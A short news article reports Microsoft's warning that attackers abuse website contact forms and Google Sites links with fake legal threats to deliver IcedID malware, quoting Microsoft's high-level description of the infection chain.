Microsoft has warned against a new, unique malware that can infect your computer via websites’ contact forms with fake legal threats.
Attackers are using legitimate Google URLs to get into a computer system. The URLs require the target to sign in with his/her Google credentials which leaves the system compromised.
As per Microsoft, the contact forms on websites are being abused by hackers to deliver malicious links. In the emails, a link is given so that the target can check the evidence behind the allegation. As soon as they click on the link, a malware called IcedID gets downloaded which can steal data from their computer systems and also lead to the installation of ransomware. The hackers are using Google URLs to cause the target to believe that it is safe to click.
Microsoft said in the blog post: “After the email recipient signs in, the sites.google.com page automatically downloads a malicious ZIP file, which contains a heavily obfuscated .js file. The malicious .js file is executed via WScript to create a shell object for launching PowerShell to download the IcedID payload (a .dat file), which is decrypted by a dropped DLL loader, as well as a Cobalt Strike beacon in the form of a stageless DLL, allowing attackers to remotely control the compromised device.”